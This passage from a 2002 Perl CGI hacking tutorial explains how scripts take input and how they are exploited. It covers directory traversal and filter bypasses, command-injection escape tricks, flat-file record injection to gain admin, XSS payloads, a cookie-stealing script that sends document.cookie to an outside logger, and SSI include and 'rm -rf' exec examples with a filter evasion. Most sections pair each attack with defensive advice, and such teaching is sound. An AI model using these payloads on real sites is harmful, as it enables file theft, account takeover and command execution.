Hacking CGI - Security and Exploitation

by b0iler :
Written for :
http://b0iler.eyeonsecurity.net/ - my site full of other cool tutorials
http://blacksun.box.sk/ - a legendary site full of original tutorials


last update May 5th 2002               

"Before I enter you to be victims of my stories, tales, lies, and exaggerations.."

Table Of Contents

INTRO
          -Useless babble


CGI SYNTAX
          -GET
          -POST
          -CGI
          -Cookies
          -ENV

PROBLEMS WITH PERL AS CGI
          -Reverse Directory Transversal
          -Flat Databases
          -Cross Site scripting
          -SSI
          -NULL Byte
          -Problems With open()
          -Perl Length Limits
          -System Commands
          -Evaluating User Input
          -Poor Input Filtering

EXAMPLES OF VULN SCRIPTS
          -Common CGI Exploits Project
          -Real Life Examples
          -perlaudit.pl - to help find your own holes

CONCLUSION
          -FAQ
          -Sources

I[ntro]


          Welcome, my name is b0iler and I will be your guide throughout this paper.  I hope you are ready and willing as this next hour or so may get pretty ugly.  With introductions out of the way I would like to state that this is not meant to be a full guide to teaching people about perl security.  There is just too many different ways to exploit perl for one paper to cover.  This paper is meant to help people secure their perl when it is used as CGI, common programming security flaws, how to exploit them, how to prevent them, and a means for me to show people how sexy perl is.  This paper will not cover all the aspects of perl security, but will try to touch on the basics of common programming vulnerabilities.  This means I won't mention stuff like how you should run your scripts at reduced privileges or how you should have permissions set correctly on all files, this is just too much for me to cover..  and has been covered well by many perl security tutorials.  This is a perl CGI paper, covering only common mistakes in people's code.

You must already know a little bit of perl before reading this.  Without the basic understanding of open(), subroutines, and regex you will be lost and I will just laugh at you.  But only the bare minimum is required.  If you have ever read Rain.Forest.Puppy's " Perl CGI problems " in Phrack #55 you will find that this tutorial barrows a lot from that and many of the techniques used are covered in that paper.  So why am I writing this? Because although that paper was brilliant, it doesn't cover many problems in CGI scripts and it is a very hard tutorial for a newbie to understand.  I will go a little more slowly in this tutorial and introduce many new problems I have found common in CGI scripts.  I plan on covering the basics of how many CGI scripts handle input and then cover a lot of techniques used by attackers to exploit these CGI scripts.

CGI stands for Common Gateway Interface and is used on millions of sites worldwide.  It allows visitors of websites to issue commands on the remote server.  Plain old html is static and doesn't allow any processing by the server.  CGI's can completely customize the web site and gives it a lot more power, control, and functionality.  CGI scripts are mostly coded in perl and to exploit them you should atleast know the basics of perl and the operating system it is being ran on.  The more you know about the factors at play the easier you will be able to see the flaws in them.  So if you know a lot about http (esp headers), perl, and the operating system you will be good to go.  CGI scripts are run server side, which means a client (you) asks the server to run the script, the server runs the script and prints output to the client.  This also means that a CGI script cannot be a security concern for the client (you)..  but can be a big security concern for the server.  Many big sites with people dedicated to network security have had CGI scripts which are vulnerable to an attacker gaining information (reading files..  credit card databases, passwords, company secrets, etc..), writing to files (adding to databases, defacing websites, add access to services, change configuration files, etc..), or even executing commands (all of the above and more!).

Don't be overwhelmed by this tutorials size or difficulty.  This stuff took me along time to learn.  Hours of experimenting, goofing off, auditting hundreds of scripts, and reading about perl was required inorder for me to feel comfortable writing this.  If you can understand most of the ideas discussed in this tutorial in a month you are doing good.  Don't expect to read it once and know how to exploit perl, I read RFP's tutorial atleast a half dozen times before I understood every bit of it (learning more and more perl inbetween reads).  Keep this in mind while reading, and please read this paper more than once.

Just to state the obvious, this tutorial does have mistakes.  Take nothing I say too seriously and don't use my examples as a guide for proper perl coding.  They are probably full of syntax errors and typos.  Any time I mention a way of getting around something or doing something there is probably another way to do it, which fits perl's slogan (There's More Than One Way To Do It).  If I did miss something that is important email me at b0iler@hotmail.com

CGI Syntax


          First of all let me say that this is not a tutorial to learn CGI from.  If you do not know how to code CGI already then this tutorial might be a little too advanced for you.  If you don't know perl then close your web browser right now and buy a perl book.  If you are rusty with CGI, or have the basic concepts down it might be nice to read over a CGI tutorial or two before continuing.  This section will just be a brief overview of all the different ways users submit data to a CGI script.  If you already know perl well you may skip over this section, if not it might be a good idea to read it.  Maybe you'll learn something, or it might help keep the info fresh while you read the rest of the paper.

CGI usually requires some form of user input, without this it is almost pointless to use a CGI script.  Perl was not built with CGI in mind, as the web was not even created yet.  So things get a little hairy for people new to perl trying to pick up on how input is sent to the script.  Basicly there is GET and POST.  These are the two main ways of getting data from the user.  There is also Cookies and Environment variables which can hold useful information some scripts use to make decisions on.


GET
          GET is the easiest to understand.  It is data sent in the URL.  You can see an example of this whenever you visit a script.cgi file with ?something at the end.  It is called GET because that is the method used in the HTTP requesting, when your browser gets the file from the server (GET /cgi-bin/file.cgi HTTP/1.1) Example: http://b0iler.eyeonsecurity.net/script.cgi?this_is_the_query_string.  That ?something is what perl calls the query string, it is stored in $ENV{'QUERY_STRING'} and is often handled like this:
	#script.cgi?sometext  would make $file = 'sometext'
$file = $ENV{'QUERY_STRING'};

or when using multiple values:
	#script.cgi?some&text  would make $name = 'some' and $file = 'text'
($name, $file) = split(/&/, $ENV{'QUERY_STRING'});

or for a more advanced way put values in a hash:
	@pair = split(/&/, $ENV{'QUERY_STRING'});
foreach $pair (@pairs){
($name, $value) = split(/=/, $pair);

#used to make + into spaces
$value =~ tr/+/ /;

#used to convert url encoding (hex) to ascii
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

$FORM{$name} = $value;
#script.cgi?name=some&file=text
#would make $FORM{'name'} = 'some' and $FORM{'file'} = 'text'
}


Here is a simple example of a GET request.  It would be nice if you knew alittle more about HTTP than what I'll explain in this tutorial.  Infact I am writting an intermediate tutorial on HTTP right after this one is finished.
	GET /script.cgi?some&text HTTP/1.0


The other basic kind of way users input data is through POST, which sends the values in the HTTP header.  Relying on values sent on client side is not secure, never think just because you are using POST data that it is any safer than GET.



POST
          POST data comes from forms you fill out on webpages and is sent to the script as the STDIN.  Some values sent to the script can be hidden, you normally cannot veiw or edit these values in a web browser since the HTTP requests are kept from the end user.  POST gets it's name from the HTTP request method used (POST /cgi-bin/file.cgi HTTP/1.1)  Here is an example of an HTML for which would submit 'name' and 'file' data in a POST.
	<form action="script.cgi" method="post">
<input type="text" name="name" value="">
<input type="hidden" name="file" value="profiles.txt">
<input type=submit value="submit">
</form>

And this would be a commonly seen way to handle POST data.  All form fields are put into $FORM{'name-of-field'}
	#read POST data into $buffer
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
($name, $value) = split(/=/, $pair);
#used to make + into spaces
$value =~ tr/+/ /;
#used to convert url encoding (hex) to ascii
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
#this would set $FORM{'name'} = whatever the user put in the text field
#and $FORM{'file'} to profile.txt
$FORM{$name} = $value;
}

Works kinda like the GET, but you use read() to read the STDIN, which is sent as content in the POST request.  CONTENT_LENGTH is used to tell the script how much to read, this will be included in the POST request.  All this works alittle bit different than GET requests do, but the CGI module works the same for GET as it does POST.  This makes it alittle more easy to remember and nicer to work with.  Many scripts rely on user submitted data to make desisions and take actions.  Sometimes the authors trust the user not to change hidden form data.  such as changing.
	<input type="hidden" name="file" value="profiles.txt">
to
<input type="hidden" name="file" value="/etc/passwd">

And then submitting the data.  As stated before, POST data is just sent with the HTTP request (as content)  This means you can very easily send these values yourself with a script or even just telnet.  An easy method for beginners is to get proxomitron and edit hidden input fields.  This also means you can bypass any kind of client side security, such as javascript checks, the http_referrer value, or html (form values).  Never trust data coming from POST anymore than you would data comming from GET or anywhere else, values can be very easily changed by attackers.  Read the HTTP rfc for more information on how exactly HTTP works or get proxomitron to change html client side.  I prefer learning and knowing things indepth, which means doing it by hand with telnet or a script I code and not with proxomitron.  Here is a quick example of a POST request:
	POST /script.cgi HTTP/1.0
Content-Length: 23
Content-Type: application/x-www-form-urlencoded

value=blah&another=bleh

POST data is a bit harder to do by hand than GET, but taking advantage of a programming language things can made fairly simple with a bit of effort.  Recieving POST and GET data isn't very hard to do, but it is alot easier to let the CGI module handle everything for you.  Also makes your code a little easier to read.


CGI
          There is also a very commonly used module for easily handling GET and POST data.  This is the CGI module, and is often used like this:
	use CGI;
#$value is a new CGI
$value=CGI->new();
$file = $value->param('file'); #script.cgi?name=some&file=text
$name = $value->param('name'); #would make $name = 'some' and $file = 'text'

I would recommend using the CGI modules for your own scripts, it is easy to understand and works very well.  Hope you know enough perl to understand the above examples.  Lets move on to the other main type of user input.



Cookies
          Cookies are a small bit of data which sites can put on your computer inorder to help identify you or keep records of your visits.  Cookies can also be left to javascript or html meta tags.  But you should be aware that perl can set cookies (using HTTP Set-Cookie header), and that data can be sent to a script in the form of cookies (in HTTP requests).  I will not bother with an example of how to set/read cookies.  Cookies aren't quite used as often as GET and POST, since they are used in just about every CGI script.  If you want to learn try looking into the CGI module and the details of how cookies work.



ENV
          As seen before with $ENV{QUERY_STRING} and $ENV{'CONTENT_LENGTH'} the %ENV hash contains many useful variables that hold information about the scripts environment.  Since some of these variables can be effected by user input they need to be fully understood by anyone coding CGIs or trying to find vulnerabilities in CGIs.  Here is a short list of some of the often abused and helpful in terms of security ENV variables.

Of course QUERY_STRING is the most abused, but you would be suprized how often things like HTTP_USER_AGENT can be misused to cause the script to do something it shouldn't.  Most of the others on this list are there because they can help make the CGI more secure.  There are alot more, but I won't bore you explaining some you will never use and don't pertain to security at all.  Instead do this to print out all the values in %ENV
	while($ename = each(%ENV)){
print "$ename = $ENV{$ename}\n";
}

This section was in no way detailed, if you do not know how HTTP headers are sent you should spend some time researching this and other aspects of how CGIs work.  I just wanted to get you fimiliar with all the different ways users can send data to the script.  Now that we know how we are sending data to the scripts, lets see how we can abuse this priviledge and prevent others from abusing our stuff.

Problems With Perl As CGI


          The reason I call this section "Problems With Perl As CGI" is because CGI scripts can be coded in pretty much any language.  Although they are commonly coded in Perl.  This is the most important part of this paper, do not skip any sections.  Even if you think you know about a subject I will be introducing some new techniques and ideas.



Reverse Directory Transversal
          We start our adventure into the realm of CGI vulnerabilities fairly simple.  If you know even the basics of the unix file system and alittle bit of Perl you will be able to understand why this is a problem.  It is a very common vulnerability called "Reverse Directory Transversal".  Which means you can move to a directory which the script is not supposed to access (the reverse means going backwards: ../).  This can allow you to read, write, delete, execute, etc..  files in a different directory than what was intended.  Here is your common open() call:
	open(FILE, "/home/user/file.txt");

Now the same exact thing but using a variable to determine which file to open:
	$this = '/home/user/file.txt';
open(FILE, "$this");

Both of these open the file /home/user/file.txt and nether of these are vulnerable at all.  They are safe from remote attacks.  Now what happends if $this is defined by user input?
	$this = $ENV{'QUERY_STRING'};      #gets the user input into $this
open(FILE, "$this"); #opens that file
@stuff = <FILE>; #puts contents of that file into @stuff array
close(FILE);

print "Content-type: text/html\n\n"; #print html to the client
print "<HTML><BODY>\n";
print @stuff;
print "</BODY></HTML>";

Now evil_attacker will make QUERY_STRING something like: /etc/passwd  or any other file they would like to read on the server.  There is another way to get to different directories you want to.  Lets say the author thought they would be safe to put a hard coded directory before the inputted file.
	$this = '/home/user/';
(undef, $this) .= split(/?/, $ENV{'QUERY_STRING'});
open(File, "$this");

Now you can't simply put /etc/passwd, but you can use ../../etc/passwd =)  Most reverse directory transversal exploits will have many ../'s in them.  And it is probably the most attempted exploit regarding unknown CGIs.  Attackers see script.cgi?file=database.txt and they immediately try script.cgi?file=../../../../etc/passwd.  So what if the script has the following for protection against reverse directory transversal:
	$this = '/home/user/';
undef, $this) .= split(/?/, $ENV{'QUERY_STRING'});
$this = s/\.\.\///g; #gets rid of ../ in $this
open(File, "$this");

This looks safe.  But if we know enough about unix and perl regex we can see a flaw.  That is .\./.\./etc/passwd =)  In unix you can use .\./ for ../ so if an attacker inputs .\./.\./file the regex "protection" will not see ../ in the string and will not filter it.  So you are thinking "just s/\\//g aswell".  Lets look at the following:
	s~\\~~g;       ( or  s/\\//g; )
s~\.\./~~g; ( or s/\.\.\///g; )

that gets rid of ../ and .\./ very well.  To the none security aware perl coder they have completed the task, they have filtered these two types of reverse directory transversal methods.  Real security programmers should always be thinking of possible ways users can evade the filters and do things which weren't meant to be done.  So lets really look at what these two filters are doing.  They are removing '../' and '\' from a string.  So something like 'f\ilter\ed' would become: 'filtered'.  And '.../...//' would become '../'  Oh no =)  This is a very exploitable filter that tons of CGI scripts use.  Even some "secure" scripts and programmers use these types of filters and never think twice about their security.  I will discuss this method of evading filters later.

So how can you stop attackers from reading/writing to any file on your system?  First make sure all key files are chmod'd correctly! There are webhosts out there that have files default to 777! Anyone can use a CGI script to read/write any file or directory.  You need to atleast set the permissions of the index of your site and all scripts and databases so that nobody abusing a CGI script can write to it.  If linux ext2 I'd suggest the chattr command.  Infact, any index.html that isn't updated often should be chattr'd and have a higher privilege than nobody or www.  Also create index.html, index.shtml, index.cgi, index.htm and any other possible extentions.  This will stop defacers from just creating an index with a different file extention which will be the default one before yours.  That was just a VERY brief warning to you webmasters out there, but file permissions is a very key part of CGI exploitation.  I won't really cover any more about them other than to make sure CGI has as little permissions as possible and to only allow files which NEED to be accessed by CGI scripts have a low enough permission to be read/write by nobody.

/me slaps b0iler with a "stay on topic for dummies" book

To actually secure your scripts you need a good input subroutine.  Don't just accept user input, don't just filter user input, deny user input! Way too many scripts try to correct user input instead of deny it.  This is a great problem.  Even security professionals make mistakes with regex.  Another thing is that sometimes perl coders forget to regex a certain meta character.  The meta characters are: &;`'\"|*?~<>^()[]{}$\n\r and they need to be filtered very carefully if you are using s//.  Here is an example from a script I recently looked at:
	$filename =~ s/([\&;\`'\|\"*\?\~\^\(\)\[\]\{\}\$\n\r])/\\$1/g;
$filename =~ s/\0//g;
unless (open(FILE, $filename))

If you notice they forgot to filter out \, so when you enter something like $filename = touch afile.txt\| it will turn out as touch afile.txt\\| which means the \ that is used to escape the meta characters is escaped instead of the |.  This error is also in a few perl security papers, so it is fairly widespread in scripts.  Again, incase you didn't understand, to exploit this filter you can escape their escape on your meta character.  So if $filename = '/bin/echo "haha" > file.txt|' it would become /bin/echo "haha" > file.txt\|' which would not work.  So try $filename = '/bin/echo "haha" > file.txt > blah\|' which will make it become '/bin/echo "haha" > file.txt > blah\\|', now the \ that the script is escaping your | with is now the character being escaped.  There are many more examples of regex not filtering properly.  I will discuss these more indepth later.  I say unless you have to (shouldn't be very often) filter input don't.  Instead, if the user submitted something they shouldn't the script should stop right there.  Don't try to correct the problem.  For instance.. if someone is inputting a pipe | into the script they are doing something wrong.. probably trying to hack it.  So why correct this? Just tell them "illegal characters detected" and stop.  This makes things such as the two regex problems listed above much more pain free and less likely to be circumvated.  Here is an example of this:
	if($file =~ /[\&;\`'\|\"*\?\~\^\(\)\[\]\{\}\$]/) {
&ErrorPageAndLog('illegal characters detected.. you have been logged');
}

This way even if you did forget the \ another meta character will be spotted and the error page will be produced anyways.  To filter for \ just add a \\ in there.  Now that your eyes are bleeding from regex, lets continue to a less hairy problem in perl scripts =)



Flat Databases
          When I talk about flat databases I am talking about plain text files used to store data.  This could be database.txt, database, file.db, or any number of others.  Basicly there are two major problems with using flat database.  First one we will cover is a perl problem, second is a misconfiguration problem.

Flat databases need to use someone to break up the input.  For instance, if a message board script puts a users name, email address, and message into messages.txt it will need to some how keep that data separate when it reads it.  It's better explained with an example =)
	use CGI;
#$input is a new cgi
$input=CGI->new();
#get GET/POST variables
$name = $input->param('name');
$mail = $input>param('mail');
$message = $input->param('message');

#print to messages database
open(DB, ">>messages.txt");
print DB "$name|$mail|$message\n";
close(DB);

This will put the 3 inputted variables into messages.txt, each one seporated by a |.  When the message board script goes to read the messages this is what the code will look like:
	#read messages database
open(DB, "<messages.txt");
@messages = <DB>;
close(DB);

#print html
print "Content-type: text/html\n\n";
print "<HTML><BODY>\n";

#loop through all the messages
foreach $msg (@messages){
#split the database fields up
($name, $mail, $message) = split(/\|/, $msg);
print "message by: <a href="mailto:$mail">$name</a>\n";
print "<br><br>\n$message\n<br><br>\n";
}
print "</BODY></HTML>";

The problem in this should jump out to any attacker.  Even if the problem isn't too big a deal in this example.  No user input is filtered or denied whatsoever.  And since each variable is seporated by a | and each post is on a newline you can submit things like flood|flood|flood\nflood|flood|flood\nflood|flood|flood\nflood|flood|flood\n to post hundreds/thousands of messages.

With a message board this isn't the biggest threat, but lets take another example.  This is a script I found that puts username|password|visits|user-agent|admin|ipaddress the admin field is 1 if the user is an admin, 0 if they are a normal user.  So what happends when input isn't filtered and someone signs up with the username of - b0iler|a|1|linux|1|127.0.0.1|\nfake? that's right..  it sets their username as b0iler, password as a, visits to 1, user-agent to linux, *admin to 1*, and ip address to 127.0.0.1 then does a line break and prints fake (which will be another username ;).  Now I have admin to the script.  It might go without saying, but sometimes scripts assume that the admin of it can be trusted with input.  I've seen a few dozen scripts where they secure all normal input, but have multiple insecurities in the admin section which can range from path discloser to full blown command execution.  Also if you can find out things like what the admin's password to the script is, or to .htaccess files chances are that they use the same password for the site's ftp/ssh/telnet.  admins, use different passwords for everything - even users, since you can't trust admins with not trying your passwords on your email accounts and such.  I've heard of someone getting rooted this way, signing up for a sight and using their root password there.

Many scripts will filter inputted username's and password's and other form variables, but they don't even look at user-agent, referrer, or any other http headers which get printed to the database! Make sure to filter these if you use them in the database or to make any decisions.  Also try to use just one character for the delimiter, if you use two then certain filtering situations can happen which lead to evasion of your delimitor filter (see filtering user input section for more details).

The other problem I see with flat databases is that the webserver is misconfigured to allow clients to read the databases!  This means all you have to do is go to http://b0iler.eyeonsecurity.net/cgi-bin/admin/database.txt to see the database.  Other file extentions apply besides just .txt, pretty much anything not defined in the apache configuration as something different is downloadable.  There are several ways to fix this, two simple ones are to create this .htaccess and put it in your directory with the database.txt file:
	<Files "*.dat">
order deny,allow
deny from all

or you could name the database file database.cgi so that when a client requests it the webserver sends it through perl first.  Perl will then create an error 500 page instead of allowing the client to read the file.  There was a problem with older php scripts using .inc for includes, which held sensitive information and could be read by clients.  So they switched it to making includes .php so they are ran through php and not displayed.  But this also introduces a new problem..  now php programmers need to be aware that their includes can be directly called and will be parsed by the server.  (sometimes includes trust that the script including it will have done something or that the data it is sending it is safe -- enough about php).

You could also name the databases starting with a . which apache will prevent people from viewing this file from the web.  Or you could just not put the database in a web readable directory.  For example if the website's root directory is /home/b0iler.eyeonsecurity.net/public_html/ then put the database in /home/b0iler.eyeonsecurity.net/

There is also the problem of having vulnerabilities in other scripts or services running on the box which will allow an attacker to read this plain text file.  With mysql or any other databases which require a valid login and password this would prevent this sort of thing from happening.  Although I stress that sql is not always the answer, if you are just going to read all of the data then sql is just a waste.  It is ment to speed up sorting/finding small bits of data from a large collection.  SQL has alot of power, and with this power comes possibility for exploitation.  This type of vulnerability is called SQL injection, since you are injecting SQL into the SQL query.  This attack is normally very easy to do and requires minimal SQL knowledge or testing.  Not a whole lot of perl scripts use SQL, but a ton of php scripts do.  I may decided to add an SQL injection section to this tutorial on a later date, but for now read some sql security/exploitation papers ( http://www.ngssoftware.com/papers/advanced_sql_injection.pdf ).



Cross Site scripting
          Cross Site scripting refers to being able to run script on a clients machine as if it came from a site.  Not your own of course - and the script shouldn't normally be there.  Most commonly it is user input that is printted to the client, but it can come in other forms.  You might also see it called CSS which I feel is pretty bad since it confuses people with Cascading Style Sheets, so XSS is what I'll call it from now on.  XSS isn't really a very dangerous problem in most situations, but as I discussed in detail in my hacking with javascript tutorial it can be a security concern for sites which store information in cookies.  I don't even really concider it much of an exploit unless the script uses cookies to identify a user or users can do things once logged in.  In a recent script I found that stores admin username's and password's in cookies and allows them to login with just a cookie you could proform a cross site scripting attack against the admin of that site, get his cookie and then have complete control over the script.  I also found a command execution in the admin part of that script, so once you have the admin cookie you can execute commands.

Here is an example to better show what XSS is and how it works.
	http://b0iler.com/script.cgi?display=<script type=text/javascript>alert('hello');</script>

Script.cgi is a perl script that will display the inputted text somewhere on the html page it outputs to the client (the user's browser).  This means the <script type=text/javascript>alert(hello);</script> will get ran by the web browser and will have been ran as if it came from that domain.  Therefore has access to cookies and other goodies.  The other goodies include the current url which can contain username, passwords, session ids, and other sensitive info.  They can redirect users to another script on that site or submit data to a script which could do things such as delete email, send email, add an admin to the database, steal credit card numbers, and virtually anything that a user can do once logged in.

The most commonly vulnerable scripts to cross site scripting are shopping cart scripts and web email scripts.  Since they require a user to login, and actions can be taken depending on what data the user submits.  Web email scripts also have the nice feature of being able to send an email with the javascript in it to read/delete/send email and change the user password.  I found this out with a large script I auditted awhile ago.

It's hard to point out exactly how to find cross site scripting vulns.  But basicly just look for any user inputted data that is printted directly to the client without any filtering.  Also things like message boards that don't filter html can have posts with scripting in them.  Here is a very simple (and common) cross site scripting problem:
	use CGI;
#$input is a new CGI
$input=CGI->new();
$email = $input->param('email');
#checks for valid email address: something@something.com
if($email !~ /^(\S+)\@(\S+).(\S+)/){
#prints $email to html, totally unfiltered.
&printhtml("error: $email is not a valid email address");
}
else{ &processemail("$email"); }

Now if you input something like <script type=text/javascript> alert(hello);</script> as your email address the error message will be printted to the client and the javascript will be ran by the browser.  The most common cross site scripting attacks focus on redirecting the user to a script that does something (send email), steals cookies, or submits form data automaticly.

Stopping XSS is not very easy.  You can filter for & ; # ( ) < and >.  And also use filtering for things like /, :, 'javascript', and escaping ' and " isn't too bad an idea.  But javascript can be made so that it can make strings even without ' or ", so do not trust any of this filtering 100%.

Filtering for the string 'script' will not work, there is spechial encoding for html which can evade this type of filtering.  Many scripts which allow some form of html try to block script and disallow 'onload', 'onclick', 'onmousover', and other actions which can execute javascript.  This is extremely hard to do.  It would be nice if there was a html tag you could use to make the browser not parse any scripting.  Since there isn't you must go through the pain of filtering or blocking all possible ways to insert javascript.  I would say to allow a very minimum group of characters.  For example only allow input to contain A-Za-z0-9.  Nothing else.  Once you try to filter out only the bad strings you are left with all sorts of possible ways to evade the filters and still print javascript.  One way is that the attacker could just include the source of the script with src.  Some examples of this are:
	<script src="http://b0iler.eyeonsecurity.net/nasty.js"></script>
<layer src="http://b0iler.eyeonsecurity.net/nasty.js"></layer>
<ilayer src="http://b0iler.eyeonsecurity.net/nasty.js"></ilayer>
<style type=text/css>@import url(http://b0iler.eyeonsecurity.net/nasty.js);</style>
<link rel=stylesheet type="text/javascript" SRC="http://b0iler.eyeonsecurity.net/nasty.js">

As you can see, some of these don't even contain the string 'script' in any way.  There are many other ways of inserting javascript, and their is certain ways for each browser that only work for that browser.  So stopping them all is almost hopeless.  Incase you run into a script which tries to filter everyway of adding javascript, here are a few more ways which can often get by filters (also the frame, applet, object, embed tags and more):
	<img src="javas
cript:alert('xss');> - line breaks and spaces can be used to evade filters.

&{alert('XSS')}; - works for netscape 4.x and can be used in many tags: <br size="&{alert('XSS')}">

<style type="text/javascript">alert('XSS');</style> - using style tag instead of script.

Of course even more ways which javascript can be put in seemingly innocent tags by the way of on* events, css, or others
	<img src="javascript:alert('XSS');"> - javascript in an img tag
<body onload="alert('script')"> - javascript in on onload event (there are other on* events).
<p style="left:expression(eval('alert(\'XSS\')'))"> - css in a p tag

Don't forget that there is more client side scripting languages than just javascript.  Many clients support others, and many scripts don't filter for anything but javascript (also activex, java, flash, actionscript, and others).
	
<img src="vbscript:code here">
<img src="mocha:code here">

If that isn't enough to worry about, you also should be converting all character encoding to UTF-8 before doing any filtering for XSS.  Although most clients which visit your site might use one type of character encoding you cannot be sure of this.  And after all that, I am sure there are plenty more ways to evade XSS filtering.  Trying to stop XSS in scripts is extremely complicated.  It is hard to be sure you did not forget or miss something without only allowing safe characters or filtering all < and > besides the ones you are sure are safe.  You could also trust other's code by using modules that filter for XSS, check out http://www.perl.com/pub/a/2002/02/20/css.html for more on this.

Cross site scripting may be a hard thing to stop in scripts that print user input to the client, but here are a few things you can do to help minimize the likely hood of serious problems:

Don't put any sensitive info in cookies.  This is way to easy for attackers to get using XSS.  Putting username and passwords in a cookie is never a good form of security and should be advoided at all costs.  Even if the cookie is encrypted.  Many times the script automaticly logs users in based on their cookie, but the cookie is encrypted for security.  This makes no sense as once someone has the contents of the cookie the security is completely broken.
Here are a few practical examples of how SSI can be dangerous.  The most common type of attack is a cookie stealing attack which takes your cookie and submits it to a CGI script.
	<script>document.location.replace('http://b0iler.com/logger.cgi?' + document.cookie);</script>

If this is printted to the client's browser it will sent them to that cookielogger.cgi with the QUERY_STRING being their cookie for that domain.  This cookielogger.cgi would be a simple script that logs whatever is inputted into a logfile.  Another common thing to do is attack people while they are logged in.  Scripts such as web based email or a content management system like phpnuke allow you to change your options, such as your password.  To change your password the javascript just needs to submit data to a script while you are logged in.  This is very easy to do and can takeover an account instantly.  Leaving the victem out in the cold, usually dumbfounded as to what just happend.

There are almost unlimited ways javascript can be used to make an attack.  For more ways look at the thread in bugtraq started on Mar 16 2002 by zeroboy@arrakis.es

http://online.securityfocus.com/archive/82/262341

The following are the replies which actually stat something true or useful.  Most posts in this thread were confusing XSS with remote file writing, also some things people said were just wrong.  But there are some good ones.

http://online.securityfocus.com/archive/82/262346
http://online.securityfocus.com/archive/82/262512
http://online.securityfocus.com/archive/82/262957
http://online.securityfocus.com/archive/82/263218
http://online.securityfocus.com/archive/82/263406

I might get alot of flack for this, but I feel that XSS is currently over hyped.  People are sending advisories to bugtraq saying that sites and scripts are vulnerable to XSS when there is no real security concern.  I feel that XSS is only a valid security problem if it can be used to gain access to something protected.  Instead of blaming XSS for the problems, I would blame doing things which allow XSS to be abused.  Things such as storing username and passwords in cookies, allowing logged in users to access or changes things without resubmitting a password, or having the session id somewhere accessable to client side scripting.  Now I am not saying XSS isn't a security problem, but it requires another variable to be abused.  In many instances XSS is not a security concern at all, and other times when it is a problem the script should fix the other variables which XSS can abuse.  Many XSS attacks require alot of social engineering to work, so exploitation is trival.  This is not a reason to say XSS isn't a problem, but it helps people realize that it isn't as big a threat as some people believe.  XSS is just too common a problem and too hard to stop, instead I suggest focusing on keeping things secure even if XSS is possible.  XSS is a security problem, and it is being abused everyday...  but currently people are going alittle nuts about it.  What I am trying to say is: don't just blame XSS as the only problem when you store username and passwords in the user's cookie, in this case the overall script design is poor.



SSI
          SSI stands for Server Side Includes, it is ment to be a very basic way to make your pages alittle more dynamic and easier to maintain.  You can include files to be printed to the client, execute commands, and even do a limitted amount of scripting with it.  Since SSI is ran server side it really isn't a cross site scripting problem at all, it is a basic file writing problem.  I am including it in this paper just to inform people who depend on SSI and any kind of scripting that they could be easily attacked with just a file writing exploit or bad permissions.  With SSI enabled on a webserver and a script prints user input to a page that allows SSI then there is a chance attackers can include files and execute commands when they view that page.  The syntax for an SSI include is:
	<!--#include file="/etc/passwd" -->

This would make the contents of the /etc/passwd file print on that page just like it was hard coded there.  The sure way to tell that SSI can be used on a page is the extention .shtml, but you never can tell for sure that .htm or .html files don't parse SSI.  It all depends on the webservers set up.  Any 'secure' site running SSI will have the command execution feature turned off, so things like this won't work:
	<!--#exec cmd="rm -rf /home/you/www" -->

Many scripts filter for this by using the following regex (it's pretty much the standard for filtering SSI):
	@pairs = split(/&/, $ENV{'QUERY_STRING'});
foreach $pair (@pairs) {
($name, $value) = split(/=/, $pair);
$value =~ s/<!--(.|\n)*-->//g;
$FORM{$name} = $value;
}

Now that $value =~ s/<!--(.|\n)*-->//g; is what is filtering SSI.  For the most part is works very well.  No encoding can be done to get around this since it is server side intrepreted and even line breaks won't work with SSI.  But if the user inputs two values which are both printed to the shtml page one after another? I have seen a few guestbooks and message boards that print things like "<br> $username $email <br><br> $message <br>".  Where you could input username as <!-- and email as #exec cmd="ls" --> which would execute the command ls.  Filtering is a very important part of Perl security, always try to imagine how you could get past the filtering and still do what you want...  sometimes very strange things will work perfectly and get past the filters.  Let's see that SSI filter again, it is supposed to stop <!-- #anything -->
	$value =~ s/<!--(.|\n)*-->//g;

now lets think about how we got around s/..\///g; by making the filter change the string into a bad string (making .../...// into ../)  Let's try the same thing here by submitting
	<!-<!-- #nothing -->- #include file="/etc/passwd" -->

Nope, this does not work, why?  Because perl's backticking feature in regex that finds the first part then starts searching from the end of the string for the rest.  So it finds the first <!-- then goes to the end and finds the first -->.  Making the string into just: <!-

Let's step back for a second, is there any possible way of getting around this?  <!-<!-- -->- #include file="/etc/passwd" -<!-- -->-> Won't work ether, since perl will again find the first <!-- and the last --> and replace it with nothing.

I brainstormed for about 30 seconds for possible ways to get around this filter.  I didn't really see any besides that one I talked about earier with using two variables side by side ($ssivar1 $ssivar2).  So I hoped on to a shell with ssi and did about 3 tests.  First one was to see if SSI worked correctly.  Second was so silly I don't wish to mention it.  And the third and final test was:
	<html>
<body>

<did it....
<!-- #include file="testfile.txt" - -> </body> </html>

Which worked.  As you can see I just added a space in between the two dashes in -->.  So now we can easily get around the SSI filter and still execute SSI on pages which are parsed by SSI.  Even sites that have .html files only still can be using SSI.  Many sites just do a 'AddHandler server-parsed .html' and keep the .html extention.  Some even do this just so attackers do not know all their pages are full of SSI.  If anyone runs into problems where a system does not work with the space between the two dashes give me an email, I only tested it on one box.  I have a few other ideas on how to evade this filter and still allow SSI to still be parsed, but I stopped when the space trick worked.



NULL Byte
          Ok, enough kids stuff.  Lets start to get serious with perl and exploitation.  This null byte problem is incredably serious and very inventive.  Who ever found this bug out deserves massive respect.  The problem is that \0 (or 00 in hex) is the NULL Byte, and perl sees the NULL Byte as the NULL character, but C does not.  And system calls such as open() and exec() are passed to the operating system.  Unix is coded in C..  and the NULL Byte in C is a string terminator.  Meaning that the string stops when there is a NULL Byte.  This probably doesn't make much sense right now, but as always the example will help you understand (it's sad..  I code better than I speak)
	#get input and put it into $file
$file = $ENV{'QUERY_STRING'};
#convert url encoding to ASCII (%00 will become the NULL Byte)
$file =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$filename = '/home/user/' . $file . '.txt';
open(FILE, "<$filename");

